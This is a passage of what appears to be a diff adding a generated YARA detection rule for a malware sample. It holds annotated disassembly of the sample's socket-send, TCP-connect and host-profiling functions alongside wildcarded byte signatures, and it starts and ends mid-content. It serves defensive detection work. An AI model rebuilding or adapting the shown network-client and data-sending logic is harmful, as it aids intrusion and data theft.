edx,dword [esp + 876] + .text:0x00401e30 56 push esi + .text:0x00401e31 8d442468 lea eax,dword [esp + 104] + .text:0x00401e35 52 push edx + .text:0x00401e36 50 push eax + .text:0x00401e37 loc_00401e37: [1 XREFS] + .text:0x00401e37 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401e3d e8ae2b0000 call 0x004049f0 ;sub_004049f0(0xbfb07fec,0xbfb082f4,<0x00401dba>) + .text:0x00401e42 6a00 push 0 + .text:0x00401e44 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e46 8d8c246c030000 lea ecx,dword [esp + 876] + .text:0x00401e4d 56 push esi + .text:0x00401e4e 51 push ecx + .text:0x00401e4f 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00401e53 e828f2ffff call 0x00401080 ;sub_00401080(0xbfb07fc4,0xbfb082f4,<0x00401dba>) + .text:0x00401e58 6a00 push 0 + .text:0x00401e5a c744241400000000 mov dword [esp + 20],0 + .text:0x00401e62 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e64 6a04 push 4 + .text:0x00401e66 6a05 push 5 
+ .text:0x00401e68 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00401e6c e81ff7ffff call 0x00401590 ;sub_00401590(0xbfb07fbc,5) + .text:0x00401e71 8d542414 lea edx,dword [esp + 20] + .text:0x00401e75 50 push eax + .text:0x00401e76 52 push edx + .text:0x00401e77 e86a5f0000 call 0x00407de6 ;msvcrt.memmove(local36,sub_00401590(0xbfb07fbc,5),5) + .text:0x00401e7c 83c40c add esp,12 + .text:0x00401e7f 6a00 push 0 + .text:0x00401e81 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e83 6a00 push 0 + .text:0x00401e85 8d4c2440 lea ecx,dword [esp + 64] + .text:0x00401e89 bf94a54000 mov edi,0x0040a594 + .text:0x00401e8e e8fdf6ffff call 0x00401590 ;sub_00401590(0xbfb07fb8,0) + .text:0x00401e93 8bf0 mov esi,eax + .text:0x00401e95 b905000000 mov ecx,5 + .text:0x00401e9a 33c0 xor eax,eax + .text:0x00401e9c f3a6 rep: cmpsb + .text:0x00401e9e 50 push eax + .text:0x00401e9f 0f85a2000000 jnz 0x00401f47 + .text:0x00401ea5 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401ea7 8b442410 mov eax,dword [esp + 16] + .text:0x00401eab 85c0 test eax,eax + .text:0x00401ead 0f84b0000000 jz 0x00401f63 + .text:0x00401eb3 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401eb7 e8c4f3ffff call 0x00401280 ;sub_00401280(local36) + .text:0x00401ebc 8b4c2410 mov ecx,dword [esp + 16] + .text:0x00401ec0 3bc1 cmp eax,ecx + .text:0x00401ec2 0f829b000000 jc 0x00401f63 + .text:0x00401ec8 51 push ecx + .text:0x00401ec9 e82e5f0000 call 0x00407dfc ;msvcrt.??2@YAPAXI@Z(0xbfb082fc) + .text:0x00401ece 8b4c2414 mov ecx,dword [esp + 20] + .text:0x00401ed2 83c404 add esp,4 + .text:0x00401ed5 8bf0 mov esi,eax + .text:0x00401ed7 51 push ecx + .text:0x00401ed8 6a00 push 0 + .text:0x00401eda 8d4c241c lea ecx,dword [esp + 28] + .text:0x00401ede e8adf6ffff call 0x00401590 ;sub_00401590(local36,0) + .text:0x00401ee3 50 push eax + .text:0x00401ee4 56 push esi + .text:0x00401ee5 e8fc5e0000 call 0x00407de6 ;msvcrt.memmove(msvcrt.??2@YAPAXI@Z(0xbfb082fc),sub_00401590(local36,0),0) + .text:0x00401eea 83c40c add esp,12 + .text:0x00401eed 
8d4c243c lea ecx,dword [esp + 60] + .text:0x00401ef1 e8eaf5ffff call 0x004014e0 ;sub_004014e0(0xbfb07fb0) + .text:0x00401ef6 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401efa e8e1f5ffff call 0x004014e0 ;sub_004014e0(local40) + .text:0x00401eff 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401f05 6800010000 push 256 + .text:0x00401f0a 8d542468 lea edx,dword [esp + 104] + .text:0x00401f0e 68a0a74000 push 0x0040a7a0 + .text:0x00401f13 52 push edx + .text:0x00401f14 e847260000 call 0x00404560 ;sub_00404560(0xbfb07fd8,0x0040a7a0,256) + .text:0x00401f19 8d4c2464 lea ecx,dword [esp + 100] + .text:0x00401f1d 8b442410 mov eax,dword [esp + 16] + .text:0x00401f21 50 push eax + .text:0x00401f22 56 push esi + .text:0x00401f23 51 push ecx + .text:0x00401f24 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401f2a e8c12a0000 call 0x004049f0 ;sub_004049f0(0xbfb07fd8,<0x00401ec9>,<0x00401dba>) + .text:0x00401f2f 8bcb mov ecx,ebx + .text:0x00401f31 8b542410 mov edx,dword [esp + 16] + .text:0x00401f35 52 push edx + .text:0x00401f36 56 push esi + .text:0x00401f37 e8a4000000 call 0x00401fe0 ;sub_00401fe0(0x61616161,<0x00401ec9>,<0x00401dba>) + .text:0x00401f3c 56 push esi + .text:0x00401f3d e89e5e0000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00401ec9>) + .text:0x00401f42 83c404 add esp,4 + .text:0x00401f45 eb1c jmp 0x00401f63 + .text:0x00401f47 loc_00401f47: [1 XREFS] + .text:0x00401f47 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f49 8d4c243c lea ecx,dword [esp + 60] + .text:0x00401f4d e88ef5ffff call 0x004014e0 ;sub_004014e0(arg0) + .text:0x00401f52 6a00 push 0 + .text:0x00401f54 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f56 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401f5a e881f5ffff call 0x004014e0 ;sub_004014e0(local36) + .text:0x00401f5f 6a00 push 0 + .text:0x00401f61 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f63 loc_00401f63: [4 XREFS] + .text:0x00401f63 8bcb mov ecx,ebx + .text:0x00401f65 e866000000 call 0x00401fd0 ;sub_00401fd0(0x61616161) + 
.text:0x00401f6a 84c0 test al,al + .text:0x00401f6c 0f85defdffff jnz 0x00401d50 + .text:0x00401f72 eb09 jmp 0x00401f7d + .text:0x00401f74 loc_00401f74: [1 XREFS] + .text:0x00401f74 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f76 loc_00401f76: [1 XREFS] + .text:0x00401f76 8bcb mov ecx,ebx + .text:0x00401f78 e833020000 call 0x004021b0 ;sub_004021b0(0x61616161) + .text:0x00401f7d loc_00401f7d: [2 XREFS] + .text:0x00401f7d 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401f81 c684247423000000 mov byte [esp + 9076],0 + .text:0x00401f89 e8c2f0ffff call 0x00401050 ;sub_00401050(local8) + .text:0x00401f8e 8d4c243c lea ecx,dword [esp + 60] + .text:0x00401f92 c7842474230000ff mov dword [esp + 9076],0xffffffff + .text:0x00401f9d e8aef0ffff call 0x00401050 ;sub_00401050(0xbfb07fd0) + .text:0x00401fa2 8b8c246c230000 mov ecx,dword [esp + 9068] + .text:0x00401fa9 5f pop edi + .text:0x00401faa 5e pop esi + .text:0x00401fab 5d pop ebp + .text:0x00401fac 83c8ff or eax,0xffffffff + .text:0x00401faf 5b pop ebx + .text:0x00401fb0 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x00401fb7 81c468230000 add esp,0x00002368 + .text:0x00401fbd c20400 ret 4 + */ + $c22 = { 6A FF 64 A1 ?? ?? ?? ?? 68 B6 83 40 00 50 B8 5C 23 00 00 64 89 25 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 6A 00 FF D5 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? 00 00 00 00 E8 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 01 8B CB C7 84 24 ?? ?? ?? ?? 01 00 00 00 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? B9 41 00 00 00 8D B4 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 6A 00 F3 A5 FF D5 6A 00 6A 00 8D 8C 24 ?? ?? ?? ?? 6A 00 51 6A 00 FF 15 ?? ?? ?? ?? 83 F8 FF 0F 84 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? B9 00 08 00 00 33 C0 8D BC 24 ?? ?? ?? ?? 6A 01 F3 AB FF D5 8B 83 ?? ?? ?? ?? 6A 00 8D 94 24 ?? ?? ?? ?? 68 00 20 00 00 52 50 FF 15 ?? ?? ?? ?? 8B F0 6A 00 85 F6 0F 8E ?? ?? ?? ?? FF D5 8D 8C 24 ?? ?? ?? ?? 56 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 
B9 3F 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 8B 0D ?? ?? ?? ?? 68 00 01 00 00 66 AB 8D 54 24 ?? 68 A0 A7 40 00 52 AA E8 ?? ?? ?? ?? 6A 00 FF D5 83 FE 09 7C ?? 8D 84 24 ?? ?? ?? ?? 6A 09 8D 4C 24 ?? 50 51 EB ?? 8D 94 24 ?? ?? ?? ?? 56 8D 44 24 ?? 52 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D5 8D 8C 24 ?? ?? ?? ?? 56 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A 00 C7 44 24 ?? 00 00 00 00 FF D5 6A 04 6A 05 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 50 52 E8 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D5 6A 00 8D 4C 24 ?? BF 94 A5 40 00 E8 ?? ?? ?? ?? 8B F0 B9 05 00 00 00 33 C0 F3 A6 50 0F 85 ?? ?? ?? ?? FF D5 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 3B C1 0F 82 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 04 8B F0 51 6A 00 8D 4C 24 ?? E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 0C 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 00 01 00 00 8D 54 24 ?? 68 A0 A7 40 00 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B 44 24 ?? 50 56 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CB 8B 54 24 ?? 52 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 04 EB ?? FF D5 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A 00 FF D5 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A 00 FF D5 8B CB E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? EB ?? FF D5 8B CB E8 ?? ?? ?? ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? 00 E8 ?? ?? ?? ?? 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 83 C8 FF 5B 64 89 0D ?? ?? ?? ?? 
81 C4 68 23 00 00 C2 04 00 } + /* +function at 0x00402310@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - send data + - send data on socket + .text:0x00402310 + .text:0x00402310 FUNC: int thiscall_caller sub_00402310( void * ecx, int arg1, int arg2, int arg3, ) [2 XREFS] + .text:0x00402310 + .text:0x00402310 Stack Variables: (offset from initial top of stack) + .text:0x00402310 12: int arg3 + .text:0x00402310 8: int arg2 + .text:0x00402310 4: int arg1 + .text:0x00402310 -255: int local255 + .text:0x00402310 -256: int local256 + .text:0x00402310 -260: int local260 + .text:0x00402310 -264: int local264 + .text:0x00402310 + .text:0x00402310 81ec08010000 sub esp,264 + .text:0x00402316 53 push ebx + .text:0x00402317 55 push ebp + .text:0x00402318 56 push esi + .text:0x00402319 8be9 mov ebp,ecx + .text:0x0040231b 57 push edi + .text:0x0040231c b93f000000 mov ecx,63 + .text:0x00402321 33c0 xor eax,eax + .text:0x00402323 8d7c2419 lea edi,dword [esp + 25] + .text:0x00402327 c644241800 mov byte [esp + 24],0 + .text:0x0040232c 6800010000 push 256 + .text:0x00402331 f3ab rep: stosd + .text:0x00402333 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402339 68a0a74000 push 0x0040a7a0 + .text:0x0040233e 66ab stosd + .text:0x00402340 aa stosb + .text:0x00402341 8d442420 lea eax,dword [esp + 32] + .text:0x00402345 c744241800000000 mov dword [esp + 24],0 + .text:0x0040234d 50 push eax + .text:0x0040234e e80d220000 call 0x00404560 ;sub_00404560(local256,0x0040a7a0,256) + .text:0x00402353 8b9c2420010000 mov ebx,dword [esp + 288] + .text:0x0040235a 8bbc241c010000 mov edi,dword [esp + 284] + .text:0x00402361 53 push ebx + .text:0x00402362 8d4c241c lea ecx,dword [esp + 28] + .text:0x00402366 57 push edi + .text:0x00402367 51 push ecx + .text:0x00402368 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x0040236e e87d260000 call 0x004049f0 ;sub_004049f0(local256,arg1,arg2) + .text:0x00402373 8bb42424010000 mov esi,dword [esp + 292] + .text:0x0040237a 8bc3 mov eax,ebx + 
.text:0x0040237c 3bc6 cmp eax,esi + .text:0x0040237e 724c jc 0x004023cc + .text:0x00402380 loc_00402380: [1 XREFS] + .text:0x00402380 c744241400000000 mov dword [esp + 20],0 + .text:0x00402388 loc_00402388: [1 XREFS] + .text:0x00402388 8b95a8000000 mov edx,dword [ebp + 168] + .text:0x0040238e 6a00 push 0 + .text:0x00402390 56 push esi + .text:0x00402391 57 push edi + .text:0x00402392 52 push edx + .text:0x00402393 ff1514924000 call dword [0x00409214] ;ws2_32.send(0x61616161,arg1,arg3,0) + .text:0x00402399 85c0 test eax,eax + .text:0x0040239b 7f0e jg 0x004023ab + .text:0x0040239d 8b4c2414 mov ecx,dword [esp + 20] + .text:0x004023a1 41 inc ecx + .text:0x004023a2 83f90f cmp ecx,15 + .text:0x004023a5 894c2414 mov dword [esp + 20],ecx + .text:0x004023a9 7cdd jl 0x00402388 + .text:0x004023ab loc_004023ab: [1 XREFS] + .text:0x004023ab 837c24140f cmp dword [esp + 20],15 + .text:0x004023b0 7464 jz 0x00402416 + .text:0x004023b2 8b4c2410 mov ecx,dword [esp + 16] + .text:0x004023b6 6a0a push 10 + .text:0x004023b8 03c8 add ecx,eax + .text:0x004023ba 03fe add edi,esi + .text:0x004023bc 894c2414 mov dword [esp + 20],ecx + .text:0x004023c0 ff1578904000 call dword [0x00409078] ;kernel32.Sleep(10) + .text:0x004023c6 2bde sub ebx,esi + .text:0x004023c8 3bde cmp ebx,esi + .text:0x004023ca 73b4 jnc 0x00402380 + .text:0x004023cc loc_004023cc: [1 XREFS] + .text:0x004023cc 85db test ebx,ebx + .text:0x004023ce 762a jbe 0x004023fa + .text:0x004023d0 33f6 xor esi,esi + .text:0x004023d2 loc_004023d2: [1 XREFS] + .text:0x004023d2 8b85a8000000 mov eax,dword [ebp + 168] + .text:0x004023d8 6a00 push 0 + .text:0x004023da 53 push ebx + .text:0x004023db 57 push edi + .text:0x004023dc 50 push eax + .text:0x004023dd ff1514924000 call dword [0x00409214] ;ws2_32.send(0x61616161,arg1,arg2,0) + .text:0x004023e3 85c0 test eax,eax + .text:0x004023e5 7f06 jg 0x004023ed + .text:0x004023e7 46 inc esi + .text:0x004023e8 83fe0f cmp esi,15 + .text:0x004023eb 7ce5 jl 0x004023d2 + .text:0x004023ed loc_004023ed: [1 
XREFS] + .text:0x004023ed 83fe0f cmp esi,15 + .text:0x004023f0 7424 jz 0x00402416 + .text:0x004023f2 8b4c2410 mov ecx,dword [esp + 16] + .text:0x004023f6 03c8 add ecx,eax + .text:0x004023f8 eb04 jmp 0x004023fe + .text:0x004023fa loc_004023fa: [1 XREFS] + .text:0x004023fa 8b4c2410 mov ecx,dword [esp + 16] + .text:0x004023fe loc_004023fe: [1 XREFS] + .text:0x004023fe 3b8c2420010000 cmp ecx,dword [esp + 288] + .text:0x00402405 750f jnz 0x00402416 + .text:0x00402407 5f pop edi + .text:0x00402408 5e pop esi + .text:0x00402409 5d pop ebp + .text:0x0040240a 8bc1 mov eax,ecx + .text:0x0040240c 5b pop ebx + .text:0x0040240d 81c408010000 add esp,264 + .text:0x00402413 c20c00 ret 12 + .text:0x00402416 loc_00402416: [3 XREFS] + .text:0x00402416 5f pop edi + .text:0x00402417 5e pop esi + .text:0x00402418 5d pop ebp + .text:0x00402419 83c8ff or eax,0xffffffff + .text:0x0040241c 5b pop ebx + .text:0x0040241d 81c408010000 add esp,264 + .text:0x00402423 c20c00 ret 12 + */ + $c23 = { 81 EC 08 01 00 00 53 55 56 8B E9 57 B9 3F 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 68 00 01 00 00 F3 AB 8B 0D ?? ?? ?? ?? 68 A0 A7 40 00 66 AB AA 8D 44 24 ?? C7 44 24 ?? 00 00 00 00 50 E8 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 53 8D 4C 24 ?? 57 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B C3 3B C6 72 ?? C7 44 24 ?? 00 00 00 00 8B 95 ?? ?? ?? ?? 6A 00 56 57 52 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 8B 4C 24 ?? 41 83 F9 0F 89 4C 24 ?? 7C ?? 83 7C 24 ?? 0F 74 ?? 8B 4C 24 ?? 6A 0A 03 C8 03 FE 89 4C 24 ?? FF 15 ?? ?? ?? ?? 2B DE 3B DE 73 ?? 85 DB 76 ?? 33 F6 8B 85 ?? ?? ?? ?? 6A 00 53 57 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 46 83 FE 0F 7C ?? 83 FE 0F 74 ?? 8B 4C 24 ?? 03 C8 EB ?? 8B 4C 24 ?? 3B 8C 24 ?? ?? ?? ?? 75 ?? 
5F 5E 5D 8B C1 5B 81 C4 08 01 00 00 C2 0C 00 5F 5E 5D 83 C8 FF 5B 81 C4 08 01 00 00 C2 0C 00 } + /* +function at 0x00401800@9324d1a8ae37a36ae560c37448c9705a with 4 features: + - act as TCP client + - connect TCP socket + - resolve DNS + - set socket configuration + .text:0x00401800 + .text:0x00401800 FUNC: int thiscall_caller sub_00401800( void * ecx, int arg1, int arg2, ) [4 XREFS] + .text:0x00401800 + .text:0x00401800 Stack Variables: (offset from initial top of stack) + .text:0x00401800 8: int arg2 + .text:0x00401800 4: int arg1 + .text:0x00401800 -12: int local12 + .text:0x00401800 -14: int local14 + .text:0x00401800 -16: int local16 + .text:0x00401800 -24: int local24 + .text:0x00401800 -28: int local28 + .text:0x00401800 -32: int local32 + .text:0x00401800 + .text:0x00401800 83ec1c sub esp,28 + .text:0x00401803 55 push ebp + .text:0x00401804 8b6c2424 mov ebp,dword [esp + 36] + .text:0x00401808 56 push esi + .text:0x00401809 57 push edi + .text:0x0040180a 85ed test ebp,ebp + .text:0x0040180c 8bf1 mov esi,ecx + .text:0x0040180e 750b jnz 0x0040181b + .text:0x00401810 5f pop edi + .text:0x00401811 5e pop esi + .text:0x00401812 33c0 xor eax,eax + .text:0x00401814 5d pop ebp + .text:0x00401815 83c41c add esp,28 + .text:0x00401818 c20800 ret 8 + .text:0x0040181b loc_0040181b: [1 XREFS] + .text:0x0040181b 8b442430 mov eax,dword [esp + 48] + .text:0x0040181f 85c0 test eax,eax + .text:0x00401821 750b jnz 0x0040182e + .text:0x00401823 5f pop edi + .text:0x00401824 5e pop esi + .text:0x00401825 33c0 xor eax,eax + .text:0x00401827 5d pop ebp + .text:0x00401828 83c41c add esp,28 + .text:0x0040182b c20800 ret 8 + .text:0x0040182e loc_0040182e: [1 XREFS] + .text:0x0040182e 8bce mov ecx,esi + .text:0x00401830 e87b090000 call 0x004021b0 ;sub_004021b0(ecx) + .text:0x00401835 8b86ac000000 mov eax,dword [esi + 172] + .text:0x0040183b 50 push eax + .text:0x0040183c ff1590904000 call dword [0x00409090] ;kernel32.ResetEvent(0x61616161) + .text:0x00401842 c686b000000000 mov byte [esi 
+ 176],0 + .text:0x00401849 a19ca54000 mov eax,dword [0x0040a59c] + .text:0x0040184e 85c0 test eax,eax + .text:0x00401850 7415 jz 0x00401867 + .text:0x00401852 83f804 cmp eax,4 + .text:0x00401855 7410 jz 0x00401867 + .text:0x00401857 83f805 cmp eax,5 + .text:0x0040185a 740b jz 0x00401867 + .text:0x0040185c 5f pop edi + .text:0x0040185d 5e pop esi + .text:0x0040185e 33c0 xor eax,eax + .text:0x00401860 5d pop ebp + .text:0x00401861 83c41c add esp,28 + .text:0x00401864 c20800 ret 8 + .text:0x00401867 loc_00401867: [3 XREFS] + .text:0x00401867 6a06 push 6 + .text:0x00401869 6a01 push 1 + .text:0x0040186b 6a02 push 2 + .text:0x0040186d ff1500924000 call dword [0x00409200] ;ws2_32.socket(2,1,6) + .text:0x00401873 83f8ff cmp eax,0xffffffff + .text:0x00401876 8986a8000000 mov dword [esi + 168],eax + .text:0x0040187c 750b jnz 0x00401889 + .text:0x0040187e 5f pop edi + .text:0x0040187f 5e pop esi + .text:0x00401880 33c0 xor eax,eax + .text:0x00401882 5d pop ebp + .text:0x00401883 83c41c add esp,28 + .text:0x00401886 c20800 ret 8 + .text:0x00401889 loc_00401889: [1 XREFS] + .text:0x00401889 55 push ebp + .text:0x0040188a ff15fc914000 call dword [0x004091fc] ;ws2_32.gethostbyname(arg1) + .text:0x00401890 8bf8 mov edi,eax + .text:0x00401892 85ff test edi,edi + .text:0x00401894 7509 jnz 0x0040189f + .text:0x00401896 5f pop edi + .text:0x00401897 5e pop esi + .text:0x00401898 5d pop ebp + .text:0x00401899 83c41c add esp,28 + .text:0x0040189c c20800 ret 8 + .text:0x0040189f loc_0040189f: [1 XREFS] + .text:0x0040189f a19ca54000 mov eax,dword [0x0040a59c] + .text:0x004018a4 66c74424180200 mov word [esp + 24],2 + .text:0x004018ab 85c0 test eax,eax + .text:0x004018ad 740a jz 0x004018b9 + .text:0x004018af 668b0d20a04000 mov cx,word [0x0040a020] + .text:0x004018b6 51 push ecx + .text:0x004018b7 eb05 jmp 0x004018be + .text:0x004018b9 loc_004018b9: [1 XREFS] + .text:0x004018b9 8b542430 mov edx,dword [esp + 48] + .text:0x004018bd 52 push edx + .text:0x004018be loc_004018be: [1 XREFS] + 
.text:0x004018be ff15f8914000 call dword [0x004091f8] ;ws2_32.htons(arg2) + .text:0x004018c4 668944241a mov word [esp + 26],ax + .text:0x004018c9 8b470c mov eax,dword [edi + 12] + .text:0x004018cc 6a10 push 16 + .text:0x004018ce 8b08 mov ecx,dword [eax] + .text:0x004018d0 8d44241c lea eax,dword [esp + 28] + .text:0x004018d4 50 push eax + .text:0x004018d5 8b11 mov edx,dword [ecx] + .text:0x004018d7 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x004018dd 51 push ecx + .text:0x004018de 89542428 mov dword [esp + 40],edx + .text:0x004018e2 ff15f4914000 call dword [0x004091f4] ;ws2_32.connect(0x61616161,local16,16) + .text:0x004018e8 83f8ff cmp eax,0xffffffff + .text:0x004018eb 750b jnz 0x004018f8 + .text:0x004018ed 5f pop edi + .text:0x004018ee 5e pop esi + .text:0x004018ef 33c0 xor eax,eax + .text:0x004018f1 5d pop ebp + .text:0x004018f2 83c41c add esp,28 + .text:0x004018f5 c20800 ret 8 + .text:0x004018f8 loc_004018f8: [1 XREFS] + .text:0x004018f8 833d9ca5400005 cmp dword [0x0040a59c],5 + .text:0x004018ff 751c jnz 0x0040191d + .text:0x00401901 8b542430 mov edx,dword [esp + 48] + .text:0x00401905 8bce mov ecx,esi + .text:0x00401907 52 push edx + .text:0x00401908 55 push ebp + .text:0x00401909 e8b2000000 call 0x004019c0 ;sub_004019c0(arg1,arg2) + .text:0x0040190e 84c0 test al,al + .text:0x00401910 750b jnz 0x0040191d + .text:0x00401912 5f pop edi + .text:0x00401913 5e pop esi + .text:0x00401914 33c0 xor eax,eax + .text:0x00401916 5d pop ebp + .text:0x00401917 83c41c add esp,28 + .text:0x0040191a c20800 ret 8 + .text:0x0040191d loc_0040191d: [2 XREFS] + .text:0x0040191d 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401923 8d44242c lea eax,dword [esp + 44] + .text:0x00401927 6a04 push 4 + .text:0x00401929 50 push eax + .text:0x0040192a 6a08 push 8 + .text:0x0040192c 68ffff0000 push 0x0000ffff + .text:0x00401931 51 push ecx + .text:0x00401932 c744244001000000 mov dword [esp + 64],1 + .text:0x0040193a ff152c924000 call dword [0x0040922c] 
;ws2_32.setsockopt(0x61616161,0x0000ffff,8,arg1) + .text:0x00401940 85c0 test eax,eax + .text:0x00401942 753a jnz 0x0040197e + .text:0x00401944 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x0040194a 50 push eax + .text:0x0040194b 8d542430 lea edx,dword [esp + 48] + .text:0x0040194f 50 push eax + .text:0x00401950 52 push edx + .text:0x00401951 50 push eax + .text:0x00401952 50 push eax + .text:0x00401953 8d442420 lea eax,dword [esp + 32] + .text:0x00401957 6a0c push 12 + .text:0x00401959 50 push eax + .text:0x0040195a 6804000098 push 0x98000004 + .text:0x0040195f 51 push ecx + .text:0x00401960 c744243001000000 mov dword [esp + 48],1 + .text:0x00401968 c744243460ea0000 mov dword [esp + 52],0x0000ea60 + .text:0x00401970 c744243888130000 mov dword [esp + 56],0x00001388 + .text:0x00401978 ff1520924000 call dword [0x00409220] ;ws2_32.WSAIoctl(0x61616161,0x98000004,local32,12,ws2_32.setsockopt(0x61616161,0x0000ffff,8,arg1),<0x0040193a>,0xbfb07fb0,<0x0040193a>) + .text:0x0040197e loc_0040197e: [1 XREFS] + .text:0x0040197e 6a01 push 1 + .text:0x00401980 6a00 push 0 + .text:0x00401982 6a00 push 0 + .text:0x00401984 56 push esi + .text:0x00401985 68d01c4000 push 0x00401cd0 + .text:0x0040198a 6a00 push 0 + .text:0x0040198c 6a00 push 0 + .text:0x0040198e c686b000000001 mov byte [esi + 176],1 + .text:0x00401995 e8465f0000 call 0x004078e0 ;sub_004078e0(0,0,0x00401cd0,ecx,0,0,1) + .text:0x0040199a 83c41c add esp,28 + .text:0x0040199d 8986a4000000 mov dword [esi + 164],eax + .text:0x004019a3 b801000000 mov eax,1 + .text:0x004019a8 5f pop edi + .text:0x004019a9 5e pop esi + .text:0x004019aa 5d pop ebp + .text:0x004019ab 83c41c add esp,28 + .text:0x004019ae c20800 ret 8 + */ + $c24 = { 83 EC 1C 55 8B 6C 24 ?? 56 57 85 ED 8B F1 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 8B 44 24 ?? 85 C0 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 8B CE E8 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? 00 A1 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 04 74 ?? 83 F8 05 74 ?? 
5F 5E 33 C0 5D 83 C4 1C C2 08 00 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 83 F8 FF 89 86 ?? ?? ?? ?? 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 55 FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 5F 5E 5D 83 C4 1C C2 08 00 A1 ?? ?? ?? ?? 66 C7 44 24 ?? 02 00 85 C0 74 ?? 66 8B 0D ?? ?? ?? ?? 51 EB ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8B 47 ?? 6A 10 8B 08 8D 44 24 ?? 50 8B 11 8B 8E ?? ?? ?? ?? 51 89 54 24 ?? FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 83 3D ?? ?? ?? ?? 05 75 ?? 8B 54 24 ?? 8B CE 52 55 E8 ?? ?? ?? ?? 84 C0 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 8B 8E ?? ?? ?? ?? 8D 44 24 ?? 6A 04 50 6A 08 68 FF FF 00 00 51 C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 8E ?? ?? ?? ?? 50 8D 54 24 ?? 50 52 50 50 8D 44 24 ?? 6A 0C 50 68 04 00 00 98 51 C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 60 EA 00 00 C7 44 24 ?? 88 13 00 00 FF 15 ?? ?? ?? ?? 6A 01 6A 00 6A 00 56 68 D0 1C 40 00 6A 00 6A 00 C6 86 ?? ?? ?? ?? 01 E8 ?? ?? ?? ?? 83 C4 1C 89 86 ?? ?? ?? ?? B8 01 00 00 00 5F 5E 5D 83 C4 1C C2 08 00 } + /* +function at 0x004052a0@9324d1a8ae37a36ae560c37448c9705a with 7 features: + - check OS version + - get disk information + - get disk size + - get local IPv4 addresses + - get memory capacity + - get socket information + - get system information on Windows + .text:0x004052a0 + .text:0x004052a0 FUNC: int cdecl sub_004052a0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x004052a0 + .text:0x004052a0 Stack Variables: (offset from initial top of stack) + .text:0x004052a0 12: int 